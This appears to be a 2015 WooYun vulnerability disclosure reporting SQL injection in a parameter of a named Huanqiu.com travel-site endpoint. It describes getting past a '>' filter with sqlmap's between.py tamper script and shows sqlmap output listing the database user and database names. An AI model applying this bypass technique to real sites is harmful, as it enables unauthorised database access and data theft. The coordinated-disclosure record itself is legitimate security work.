当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147943

漏洞标题:环球网某站接口注入(between技巧)

相关厂商:环球网

漏洞作者: 路人甲

提交时间:2015-10-20 10:07

修复时间:2015-12-05 09:10

公开时间:2015-12-05 09:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向核心白帽子及相关领域专家公开
2015-11-10: 细节向普通白帽子公开
2015-11-20: 细节向实习白帽子公开
2015-12-05: 细节向公众公开

简要描述:

环球网某站注入(between技巧)

详细说明:

http://go.huanqiu.com/service/vacation?callback=show_vacation&dest=1
dest
由于过滤了 > ,因此使用sqlmap的between.py就可以注入了

漏洞证明:

[07:30:04] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[07:30:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[07:30:04] [INFO] fetching database users
[07:30:04] [INFO] fetching number of database users
[07:30:04] [INFO] resumed: 1
[07:30:04] [INFO] resumed: 'w0q2azi6'@'10.68.250.75'
database management system users [1]:
[*] 'w0q2azi6'@'10.68.250.75'
[07:30:04] [INFO] fetching database names
[07:30:04] [INFO] fetching number of databases
[07:30:04] [INFO] resumed: 4
[07:30:04] [INFO] resumed: information_schema
[07:30:04] [INFO] resumed: sarons
[07:30:04] [INFO] resumed: saronscms
[07:30:04] [INFO] resumed: travel
available databases [4]:
[*] information_schema
[*] sarons
[*] saronscms
[*] travel

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-10-21 09:08

厂商回复:

感谢提醒。

最新状态:

暂无